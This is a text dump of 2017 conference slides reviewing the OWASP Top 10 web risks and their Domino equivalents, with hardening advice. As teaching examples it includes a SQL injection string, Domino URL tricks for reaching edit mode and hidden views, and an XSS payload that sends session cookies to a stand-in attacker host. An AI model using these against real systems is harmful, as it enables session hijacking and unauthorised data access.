SlideShare a Scribd company logo
1 of 44
Download to read offline
MWLUG 2017
Moving Collaboration Forward
Can Domino Be Hacked?
Lessons We Can Learn From the
Security Community
Howard Greenberg
Andrew Pollack
MWLUG 2017
Moving Collaboration Forward
Our Amazing Sponsors
MWLUG 2017
Moving Collaboration Forward
Andrew Pollack
Northern Collaborative Technologies
• Administrator & Developer since version 2.0
• IBM Lotus Beacon Award Winner
• Services
– Security Review & Penetration Testing
– Site Performance & Security Reviews
– Expert Witness & Security Forensics
– Application Development
– Administrative Overhaul
• Products
– NCT Search
– NCT Compliance Search
– NCT Simple Sign On
– NCT SAML for Domino 7+
• Structural Firefighter
MWLUG 2017
Moving Collaboration Forward
Howard Greenberg
• Been doing Notes/Domino since 1993
– Developer, Admin, Consultant, Instructor
• Co-founded TLCC in 1998
– Self-paced courses for Notes/Domino and XPages
• Security Certifications
– Certified Information Systems Auditor (CISA)
– Certified Information Security Manager (CISM)
• Certified Flight Instructor (CFI)
MWLUG 2017
Moving Collaboration Forward
Session Goals
• Review the OWASP Top 10 Web Application
Security Issues
• Relate those to our Domino environments
HG
MWLUG 2017
Moving Collaboration Forward
Why do I care?
• I have a firewall, no one can touch my Domino
environment!
HG
MWLUG 2017
Moving Collaboration Forward
Reality
Vendors
Suppliers
Customers
Employees
HG
MWLUG 2017
Moving Collaboration Forward
Major Breaches
• Target – 70MM customer accounts
– Stole logins from the HVAC subcontractor
• Via phishing email, then malware got installed
– Once in, pivoted to registers, installed malware
• Captured credit card information, then uploaded to hackers
– Lesson learned, segment networks, encrypt sensitive
data
Did the Firewall help?
https://www.sans.org/reading-
room/whitepapers/casestudies/case-study-critical-controls-
prevented-target-breach-35412
HG
MWLUG 2017
Moving Collaboration Forward
OPM Breach
• Office of Personnel Management (US)
– Personal data on EVERY Federal employee
• Plus more...
• Phishing attack – got login data from a
contractor – put malware on admin server
• Lack of encryption on sensitive databases
https://www.wired.com/2016/10/inside-cyberattack-shocked-
us-government/
HG
MWLUG 2017
Moving Collaboration Forward
Who/What is OWASP
• “Open Web Application Security Project (OWASP) is a 501(c)(3)
worldwide not-for-profit charitable organization focused on
improving the security of software”
• Publishes a list of the 10 Most Critical Web Application Security
Risks – Widely Respected
– For each Risk it provides:
• A description
• Example vulnerabilities
• Example attacks
• Guidance on how to avoid
• References to OWASP and other related resource
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
HG
MWLUG 2017
Moving Collaboration Forward
Top 10 for 2017 (Release Candidate)
• A1-Injection
• A2-Broken Authentication and Session Management
• A3-Cross-Site Scripting (XSS)
• A4-Broken Access Control
• A5-Security Misconfiguration
• A6-Sensitive Data Exposure
• A7-Insufficient Attack Protection
• A8-Cross-Site Request Forgery (CSRF)
• A9-Using Components with Known Vulnerabilities
• A10-Underprotected APIs
HG https://www.owasp.org/index.php/Top_10_2017-Top_10
MWLUG 2017
Moving Collaboration Forward
Sample of
Information
Published
Link to PDF
HG
MWLUG 2017
Moving Collaboration Forward
A1 - Injection
The best way to find out if an application is vulnerable to injection is to verify
that all use of interpreters clearly separates untrusted data from the
command or query..
Typically SQL injection, got any sql code in your apps (accessing relational
data)? like:
String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
the attacker modifies the ‘id’ parameter value in her browser to send: ' or
'1'='1. For example:
http://example.com/app/accountView?id=‘ or '1'='1
This changes the meaning of both queries to return all the records from the
accounts table. More dangerous attacks could modify data or even invoke
stored procedures
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A1
• Got SQL code?
– Use SQL parameters
“SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'"
"SELECT * FROM accounts WHERE custID= ?”
– Scrub input
– use prepared statements
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A1
• Hack Domino urls
– Switch from openDocument to editDocument
http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9
B86441DFF85258154004A827A&action=openDocument
• Pivot to read all documents – open default view
http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview
• Use zero as the view and open any document by
id
http://www.tlcc.com/mwlug/mwlug2017.nsf/0/
557d7b9b86441dff85258154004a827a?EditDocument
Fix - use proper reader/author names
Block view access with $$ViewTemplateDefault
HG
MWLUG 2017
Moving Collaboration Forward
A2-Broken Authentication and Session
Management - What is it?
• User authentication credentials aren’t properly protected
when stored using hashing or encryption.
• Credentials can be guessed or overwritten through weak
account management functions
• Session IDs are exposed in the URL
• Session IDs are vulnerable to session fixation attacks.
• Session IDs don’t timeout, or user sessions or
authentication tokens aren’t properly invalidated during
logout.
• Session IDs aren’t rotated after successful login.
• Passwords, session IDs, and other credentials are sent over
unencrypted connections.
AP
MWLUG 2017
Moving Collaboration Forward
A2-Protecting Stored Credentials
• Domino is fairly good at this if you let it
– Use Minimum Password Requirements
– Protect your Domino Directory
– Don’t store a password file “just in case”
– Use the “Fewer Name Variants” option
• Beware of SSO Solutions – Including SAML
– You may be turning over all authentication
controls to some other system!
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Weak Management Practices
• Beware of password recovery processes
– How do you verify the person requesting the
password reset is really the person who should
have it? This can also be used to deny service.
– Any web site that can send you your old password
when you request it should not be trusted
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Session IDs in the URL
• While Domino doesn’t generally do this, some
administrators do this to avoid creating
Domino users, or to give specific user content
within applications based on URLs
– E.G. Urls that contain specific invoice numbers or
trouble ticket ids to send users to specific
documents
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Session “Fixation” Attacks
• Can your stored authentication token be captured
an re-used in Domino?
– Spoiler Alert: Yes, it can – and quite easily
• In Session based authentication the session token
is stored in a cookie.
• Anyone who can create web pages on your server
can capture this using a bit of javascript.
– Other servers – including non-Domino servers within
your domain may be able to capture this cookie as
well
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Preventing Domino “Fixation”
attacks on your Domino Servers
• Code review applications
• Follow XSS prevention best practices
• Change the default cookie domain path in
your session ltpa token documents
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Passwords, session IDs, on
unencrypted connections
• There should no longer be any reason to allow
unencrypted http connections at all. Sorry.
It’s 2017. Stop doing this.
AP
MWLUG 2017
Moving Collaboration Forward
A3 - Cross Site Scripting (XSS)
You are vulnerable to Server XSS if your server-side code uses user-supplied
input as part of the HTML output, and you don’t use context-sensitive
escaping to ensure it cannot run. If a web page uses JavaScript to dynamically
add attacker-controllable data to a page, you may have Client XSS. Ideally, you
would avoid sending attacker-controllable data to unsafe JavaScript APIs, but
escaping (and to a lesser extent) input validation can be used to make this
safe.
Example Attack Scenario
The application uses untrusted data in the construction of the following HTML
snippet without validation or escaping: (String) page += "<input
name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in his browser to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
This attack causes the victim’s session ID to be sent to the attacker’s website,
allowing the attacker to hijack the user’s current session.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerability – A3
• YES, any web application is!!!
• Any text input, especially rich text (converts to
link)
• Prevention
– Always sanitize any input
• Domino web – look for html tags, strip out
– Have to roll your own with LotusScript
– Note: CSJS is not an option!
• XPages have HTML Filters
HG
MWLUG 2017
Moving Collaboration Forward
XPages HTML Filters
• XPages has built-in filtering
• Have to turn on
– HTMLFilter – for output
– HTMLFilterIn – filters on saving
• Use acf as the option!
– Identity does nothing, empty kills everything
– Turn on for all rich text (server, app, or XPage)
xsp.richtext.default.htmlfilter=acf
HG
More Information!
MWLUG 2017
Moving Collaboration Forward
A4-Broken Access Control
• Not just ACL Settings – but includes them
– Maximum Internet Name & Password Access
– Anonymous & Default “No Access” on all database
you don’t expect web users to access
– Obscurity is not Security – (See App Dev Practices)
AP
MWLUG 2017
Moving Collaboration Forward
A5-Security Misconfiguration
• Don’t expose your operating system to the
internet.
• Turn off all services you don’t need
• Keep your Domino version fully up to date
– Tools like “Metasploit” know all about Domino
– Out of date servers can be hacked to a remote
command line in 30 seconds with menu driven
hacking tools
AP
MWLUG 2017
Moving Collaboration Forward
A5 – Use Good HTTP Password
Management practices
• Assign HTTP Passwords even if you don’t use
them. This field will get filled in with garbage
if you do not.
– These are also used to attack your SMTP mail
handler
AP
MWLUG 2017
Moving Collaboration Forward
A5 – Don’t Help the Hackers
• By default your server tells the world what
software you’re running.
It’s like you WANT to get hacked
AP
MWLUG 2017
Moving Collaboration Forward
A5 – Don’t Help the Hackers!
• HTTPDisableServerHeader=1
• Then Get Fancy! Add your own SERVER header
AP
MWLUG 2017
Moving Collaboration Forward
A5 - Set up SSL the right way
• Use TLS
• Use the right SSL settings
• Use a score check service to validate
AP
www.ssllabs.com/ssltest/index.html
MWLUG 2017
Moving Collaboration Forward
A5 – Domino Web Server Settings
May need to modify ciphers available
Disable_SSLV3=1
SSL_USE_CLIENT_CIPHER_ORDER=1
MWLUG 2017
Moving Collaboration Forward
A6- Sensitive Data Exposure
Am I vulnerable to Data Exposure? The first thing you have to
determine is which data is sensitive enough to require extra
protection. For example, passwords, credit card numbers, health
records, and personal information should be protected. For all such
data:
1. Is any of this data stored in clear text long term, including backups
of this data?
2. Is any of this data transmitted in clear text, internally or
externally? Internet traffic is especially dangerous.
3. Are any old / weak cryptographic algorithms used?
4. Are weak crypto keys generated, or is proper key management or
rotation missing?
5. Are any browser security directives or headers missing when
sensitive data is provided by / sent to the browser?
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerability – A6
Know your data, what is sensitive - RISK ANALYSIS!
• HTTPS should be turned on/forced for anything that may be
sensitive - protect data in motion
• Store data in encrypted fields protect data when sitting
– Notes encryption (field level), now in XPages in FP8!
• Use TLS 1.2 only, older encryption is vulnerable
– Turn off SSLV3
• Passwords in names.nsf
– setting to hash in better encrypted ways
• PCI - If your company takes credit cards, you are subject to
PCI
• PII - personal information, many rules for EU, states, etc.
HG
MWLUG 2017
Moving Collaboration Forward
A7 - Insufficient Attack Protection
Am I Vulnerable to Attack?
Detecting, responding to, and blocking attacks makes
applications dramatically harder to exploit yet almost no
applications or APIs have such protection. Critical
vulnerabilities in both custom code and components are also
discovered all the time, yet organizations frequently take
weeks or even months to roll out new defenses.
It should be very obvious if attack detection and response
isn’t in place. Simply try manual attacks or run a scanner
against the application. The application or API should identify
the attacks, block any viable attacks, and provide details on
the attacker and characteristics of the attack. If you can’t
quickly roll out virtual and/or actual patches when a critical
vulnerability is discovered, you are left exposed to attack.AP
MWLUG 2017
Moving Collaboration Forward
A7-Insufficient Attack Protection
• Is anyone monitoring your HTTP and SMTP
logs to look for attacks?
• Does your company have an IDS (Intrusion
Detection System)?
• Fail2Ban – Poor Linux Admin’s IDS
AP
MWLUG 2017
Moving Collaboration Forward
A8 - Cross-Site Request Forgery (CSRF)
Am I Vulnerable to CSRF?
To check whether an application is vulnerable, see if any links and
forms lack an unpredictable CSRF token. Without such a token,
attackers can forge malicious requests. An alternate defense is to
require the user to prove they intended to submit the request, such as
through reauthentication.
Focus on the links and forms that invoke state-changing functions,
since those are the most important CSRF targets. Multistep
transactions are not inherently immune. Also be aware that Server-
Side Request Forgery (SSRF) is also possible by tricking apps and APIs
into generating arbitrary HTTP requests.
Note that session cookies, source IP addresses, and other information
automatically sent by the browser don’t defend against CSRF since
they are included in the forged requests.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A8
• Prevent your content from being rendered in an
iframe or frameset that you did not generate.
• Domino web admin is vulnerable, turn off!
• Domino frameset
– DominoValidateFramesetSRC=1 - make sure the
content in the frameset comes from the same
database
https://www-
10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC
• Set header - (note required for PCI compliance)
http://www-01.ibm.com/support/docview.wss?uid=swg21568598
HG
MWLUG 2017
Moving Collaboration Forward
A8 – X-Frame-Options Header
• Use the header “X-Frame-Options” to tell browsers not
to allow your page to be loaded in someone else’s
frame
– Frequently required by customer security audits
AP
MWLUG 2017
Moving Collaboration Forward
A9 - Using Components with Known
Vulnerabilities
• The challenge is to continuously monitor the components (both client-side
and server-side) you are using for new vulnerability reports. This
monitoring can be very difficult because vulnerability reports are not
standardized, making them hard to find and search for the details you
need (e.g., the exact component in a product family that has the
vulnerability). Worst of all, many vulnerabilities never get reported to
central clearinghouses like CVE and NVD.
• Determining if you are vulnerable requires searching these databases, as
well as keeping abreast of project mailing lists and announcements for
anything that might be a vulnerability. This process can be done manually,
or with automated tools. If a vulnerability in a component is discovered,
carefully evaluate whether you are actually vulnerable. Check to see if
your code uses the vulnerable part of the component and whether the
flaw could result in an impact you care about. Both checks can be difficult
to perform as vulnerability reports can be deliberately vague.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A9
• What software is your application using? Does
that have vulnerabilities?
– JS libraries like jQuery, Select2
– Java libraries (pdf, JSON, credit card...)
• What software is IBM using? (Example Java
libraries, Apache struts, etc.)
– Example: Apache Struts vulnerability
– Be sure to keep the Domino JVM updated
– Interim fixes
– Latest Fix PackHG
MWLUG 2017
Moving Collaboration Forward
A10 – Under-protected APIs
Am I Vulnerable to Attack?
Testing your APIs for vulnerabilities should be similar to testing the rest of
your application for vulnerabilities. All the different types of injection,
authentication, access control, encryption, configuration, and other issues
can exist in APIs just as in a traditional application.
However, because APIs are designed for use by programs (not humans) they
frequently lack a UI and also use complex protocols and complex data
structures. These factors can make security testing difficult. The use of
widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and
XML. Some frameworks like GWT and some RPC implementations use custom
formats. Some applications and APIs create their own protocol and data
formats, like WebSockets. The breadth and complexity of APIs make it difficult
to automate effective security testing, possibly leading to a false sense of
security.
Ultimately, knowing if your APIs are secure means carefully choosing a
strategy to test all defenses that matter.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A10
• Know what is turned on in your applications
and server.
– Is Domino DAS turned on?
• REST access to a database
– XPages REST, agents that serve up REST data, etc.
• Do a Code review, understand what data these
might serve up and how much access is given.
HG
MWLUG 2017
Moving Collaboration Forward
Closing
• Security is the responsibility of EVERYONE
• Especially those of us in IT, even without a
security job
– Developers have to ALWAYS design for security
– Admins have to ALWAYS plan and monitor to build
resilient systems
– Management has to provide the resources and
focus

More Related Content

What's hot

From frustration to fascination: dissecting Replication
From frustration to fascination: dissecting ReplicationFrom frustration to fascination: dissecting Replication
From frustration to fascination: dissecting ReplicationBenedek Menesi
 
HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...
HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...
HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...Ales Lichtenberg
 
RESTful services on IBM Domino/XWork
RESTful services on IBM Domino/XWorkRESTful services on IBM Domino/XWork
RESTful services on IBM Domino/XWorkJohn Dalsgaard
 
IBM Domino / IBM Notes Performance Tuning
IBM Domino / IBM Notes Performance Tuning IBM Domino / IBM Notes Performance Tuning
IBM Domino / IBM Notes Performance Tuning Vladislav Tatarincev
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query LanguageTim Davis
 
Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)Slobodan Lohja
 
Domino Administration Wizardry - Dark Arts Edition
Domino Administration Wizardry - Dark Arts EditionDomino Administration Wizardry - Dark Arts Edition
Domino Administration Wizardry - Dark Arts EditionKeith Brooks
 
dominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptxdominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptxUlrich Krause
 
Java for XPages Development
Java for XPages DevelopmentJava for XPages Development
Java for XPages DevelopmentTeamstudio
 
Simplifying The S's: Single Sign-On, SPNEGO and SAML
Simplifying The S's: Single Sign-On, SPNEGO and SAMLSimplifying The S's: Single Sign-On, SPNEGO and SAML
Simplifying The S's: Single Sign-On, SPNEGO and SAMLGabriella Davis
 
Introduction to Web Hosting.
Introduction to Web Hosting.Introduction to Web Hosting.
Introduction to Web Hosting.Cloudbells.com
 
RNUG - HCL Notes V11 Performance Boost
RNUG - HCL Notes V11 Performance BoostRNUG - HCL Notes V11 Performance Boost
RNUG - HCL Notes V11 Performance BoostChristoph Adler
 
Engage2022 - Domino Admin Tips
Engage2022 - Domino Admin TipsEngage2022 - Domino Admin Tips
Engage2022 - Domino Admin TipsGabriella Davis
 
INF107 - Integrating HCL Domino and Microsoft 365
INF107 - Integrating HCL Domino and Microsoft 365INF107 - Integrating HCL Domino and Microsoft 365
INF107 - Integrating HCL Domino and Microsoft 365Dylan Redfield
 
Improving notes addressing experience with recent contacts
Improving notes addressing experience with recent contactsImproving notes addressing experience with recent contacts
Improving notes addressing experience with recent contactsVinayak Tavargeri
 
IBM Notes Traveler Best Practices
IBM Notes Traveler Best PracticesIBM Notes Traveler Best Practices
IBM Notes Traveler Best Practicesjayeshpar2006
 

What's hot (20)

From frustration to fascination: dissecting Replication
From frustration to fascination: dissecting ReplicationFrom frustration to fascination: dissecting Replication
From frustration to fascination: dissecting Replication
 
HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...
HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...
HCL Sametime 12.0 – Converting from native Domino Directory to LDAP and Migra...
 
RESTful services on IBM Domino/XWork
RESTful services on IBM Domino/XWorkRESTful services on IBM Domino/XWork
RESTful services on IBM Domino/XWork
 
IBM Domino / IBM Notes Performance Tuning
IBM Domino / IBM Notes Performance Tuning IBM Domino / IBM Notes Performance Tuning
IBM Domino / IBM Notes Performance Tuning
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query Language
 
Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)
 
Domino Adminblast
Domino AdminblastDomino Adminblast
Domino Adminblast
 
Domino Administration Wizardry - Dark Arts Edition
Domino Administration Wizardry - Dark Arts EditionDomino Administration Wizardry - Dark Arts Edition
Domino Administration Wizardry - Dark Arts Edition
 
dominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptxdominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptx
 
Java for XPages Development
Java for XPages DevelopmentJava for XPages Development
Java for XPages Development
 
Simplifying The S's: Single Sign-On, SPNEGO and SAML
Simplifying The S's: Single Sign-On, SPNEGO and SAMLSimplifying The S's: Single Sign-On, SPNEGO and SAML
Simplifying The S's: Single Sign-On, SPNEGO and SAML
 
plug ins
plug insplug ins
plug ins
 
Introduction to Web Hosting.
Introduction to Web Hosting.Introduction to Web Hosting.
Introduction to Web Hosting.
 
RNUG - HCL Notes V11 Performance Boost
RNUG - HCL Notes V11 Performance BoostRNUG - HCL Notes V11 Performance Boost
RNUG - HCL Notes V11 Performance Boost
 
Engage2022 - Domino Admin Tips
Engage2022 - Domino Admin TipsEngage2022 - Domino Admin Tips
Engage2022 - Domino Admin Tips
 
Daos
DaosDaos
Daos
 
Hash cat
Hash catHash cat
Hash cat
 
INF107 - Integrating HCL Domino and Microsoft 365
INF107 - Integrating HCL Domino and Microsoft 365INF107 - Integrating HCL Domino and Microsoft 365
INF107 - Integrating HCL Domino and Microsoft 365
 
Improving notes addressing experience with recent contacts
Improving notes addressing experience with recent contactsImproving notes addressing experience with recent contacts
Improving notes addressing experience with recent contacts
 
IBM Notes Traveler Best Practices
IBM Notes Traveler Best PracticesIBM Notes Traveler Best Practices
IBM Notes Traveler Best Practices
 

Similar to MWLUG 2017: Lessons on Domino Security from the OWASP Top 10

AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers Lewis Ardern
 
Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck Benedek Menesi
 
Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...panagenda
 
Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...Benedek Menesi
 
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...Meghan Weinreich
 
O365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas VochtenO365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas VochtenNCCOMMS
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Proxy Caches and Web Application Security
Proxy Caches and Web Application SecurityProxy Caches and Web Application Security
Proxy Caches and Web Application Security Tim Bass
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Developing Secure Web Apps
Developing Secure Web AppsDeveloping Secure Web Apps
Developing Secure Web AppsMark Garratt
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationTriNimbus
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 Natalia Kataoka
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtTechWell
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119lior mazor
 
Challenges In Modern Application
Challenges In Modern ApplicationChallenges In Modern Application
Challenges In Modern ApplicationRahul Kumar Gupta
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 

Similar to MWLUG 2017: Lessons on Domino Security from the OWASP Top 10 (20)

AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck
 
Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...
 
Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...
 
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
O365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas VochtenO365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Proxy Caches and Web Application Security
Proxy Caches and Web Application SecurityProxy Caches and Web Application Security
Proxy Caches and Web Application Security
 
Windows Azure Essentials V3
Windows Azure Essentials V3Windows Azure Essentials V3
Windows Azure Essentials V3
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Developing Secure Web Apps
Developing Secure Web AppsDeveloping Secure Web Apps
Developing Secure Web Apps
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical Debt
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
 
Challenges In Modern Application
Challenges In Modern ApplicationChallenges In Modern Application
Challenges In Modern Application
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 

More from Howard Greenberg

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12Howard Greenberg
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...Howard Greenberg
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)Howard Greenberg
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedHoward Greenberg
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoHoward Greenberg
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerHoward Greenberg
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesHoward Greenberg
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021Howard Greenberg
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesHoward Greenberg
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveHoward Greenberg
